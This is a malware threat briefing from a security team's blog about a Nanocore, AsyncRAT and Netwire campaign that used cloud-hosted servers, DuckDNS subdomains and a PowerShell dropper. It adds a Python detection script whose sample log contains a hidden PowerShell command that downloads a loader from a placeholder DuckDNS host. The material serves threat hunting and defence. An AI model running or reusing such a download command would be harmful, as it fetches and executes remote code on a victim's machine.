BLOG CERT SOGETI ESEC

Briefing Malware - 18/01/2022

18 January 2022 - Winners of the 3rd week: Redline, NjRAT and Nanocore.

Some links point to extended actionable intelligence (Threat Bulletins, TTPs, signatures, etc.) on our Threat Intelligence Platform, Anomali. This access is limited to our clients.


Threat statistics report

Publication date: 18/01/2022

Distribution: TLP:WHITE

What's new?

Nanocore (MITRE ATT&CK ID: S0336) / AsyncRAT (NC)

Nanocore, Netwire and AsyncRAT spreading campaign uses public cloud infrastructure

#Cisco Talos analyzed a malicious campaign spotted at the end of October 2021 that delivered several Remote Access Trojans (#RAT), mostly to targets in the United States, Italy and Singapore.

The threat actor, which has not been named by Talos, deployed a distributed infrastructure relying on cloud resources such as #Amazon AWS EC2 or #Microsoft Azure instances to host their Command-and-Control (#C&C) servers, and even deployed web servers to host malware such as #Nanocore, #AsyncRAT or #Netwire. They created malicious DNS subdomains via #DuckDNS, a free dynamic DNS service, to point at their download servers.

A #PowerShell dropper built with the #Hcrypt crypter was identified in the infection chain; it had already been spotted by #TrendMicro researchers in a previous campaign named Water Basilisk (source). Hcrypt is considered a #crypter-as-a-service: it gives threat actors who lack the time or resources to build their own tooling access to sophisticated malware deployment for a minimal investment.
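The two observable traits described above, free dynamic-DNS subdomains pointing at download servers and a PowerShell stage fetching from them, are what a defender can hunt for in resolver and endpoint telemetry. The script below is an added example written for this briefing; it is not code from CERT Sogeti ESEC, Cisco Talos or Trend Micro. It assumes a simplistic DNS query log format and a process-creation log format, both constructed here for illustration, and it only watches the duckdns.org suffix because that is the provider named in the campaign write-up; other providers, hostnames and IP addresses are placeholders.

```python
"""
Added example (not part of the CERT Sogeti briefing or the Talos report):
flag DNS queries to dynamic-DNS subdomains and raise severity when the same
host also ran PowerShell with a URL pointing at that subdomain.
"""
import re
from collections import defaultdict

# Dynamic-DNS suffixes to watch. The briefing names DuckDNS only; extend as needed.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org",)

# Constructed DNS log lines: "<timestamp> <client_ip> query <fqdn>"
DNS_LOG = """\
2021-10-28T09:12:01Z 10.0.0.15 query updates.example-corp.internal
2021-10-28T09:12:07Z 10.0.0.15 query payloadhost-1234.duckdns.org
2021-10-28T09:13:44Z 10.0.0.22 query mail.example-corp.internal
2021-10-28T09:14:02Z 10.0.0.31 query c2-relay-77.duckdns.org
"""

# Constructed process-creation lines: "<timestamp> <client_ip> <image> <command line>"
PROC_LOG = """\
2021-10-28T09:12:09Z 10.0.0.15 powershell.exe powershell -w hidden -c "(New-Object Net.WebClient).DownloadString('http://payloadhost-1234.duckdns.org/loader.txt')"
2021-10-28T09:13:50Z 10.0.0.22 outlook.exe outlook.exe /recycle
2021-10-28T09:14:05Z 10.0.0.31 powershell.exe powershell -ep bypass -f C:\\Users\\Public\\update.ps1
"""

DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) query (?P<fqdn>\S+)$")
PROC_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<image>\S+) (?P<cmd>.*)$")
# Hostname part of any http(s) URL embedded in a command line.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def is_dynamic_dns(fqdn):
    """True when fqdn is a watched provider domain or one of its subdomains."""
    fqdn = fqdn.lower().rstrip(".")
    return any(fqdn == s or fqdn.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def dynamic_dns_queries(dns_log):
    """Return {client_ip: set(fqdn)} for every query to a watched dynamic-DNS name."""
    hits = defaultdict(set)
    for line in dns_log.splitlines():
        m = DNS_RE.match(line)
        if m and is_dynamic_dns(m["fqdn"]):
            hits[m["ip"]].add(m["fqdn"].lower())
    return dict(hits)


def powershell_downloads(proc_log):
    """Return [(client_ip, host)] for PowerShell command lines that embed a URL."""
    out = []
    for line in proc_log.splitlines():
        m = PROC_RE.match(line)
        if not m or "powershell" not in m["image"].lower():
            continue
        for host in HOST_RE.findall(m["cmd"]):
            out.append((m["ip"], host.lower()))
    return out


def correlate(dns_log, proc_log):
    """Join the two signals per client.

    A dynamic-DNS lookup alone is 'medium' (plenty of benign uses exist);
    the same client running PowerShell with a URL on that name is 'high'.
    Returns a sorted list of (client_ip, fqdn, severity).
    """
    dns_hits = dynamic_dns_queries(dns_log)
    ps_hits = set(powershell_downloads(proc_log))
    findings = []
    for ip, fqdns in dns_hits.items():
        for fqdn in fqdns:
            severity = "high" if (ip, fqdn) in ps_hits else "medium"
            findings.append((ip, fqdn, severity))
    return sorted(findings)


if __name__ == "__main__":
    for ip, fqdn, severity in correlate(DNS_LOG, PROC_LOG):
        print(f"{severity:6} {ip:12} {fqdn}")
```

The correlation deliberately keeps a bare dynamic-DNS lookup at medium severity: home users, IoT devices and some legitimate remote-access setups resolve such names all day, so the PowerShell-with-URL join is what turns a noisy indicator into something worth an analyst's time. In a real deployment the two log sources would be joined within a time window rather than over the whole file.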


https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html


Download the report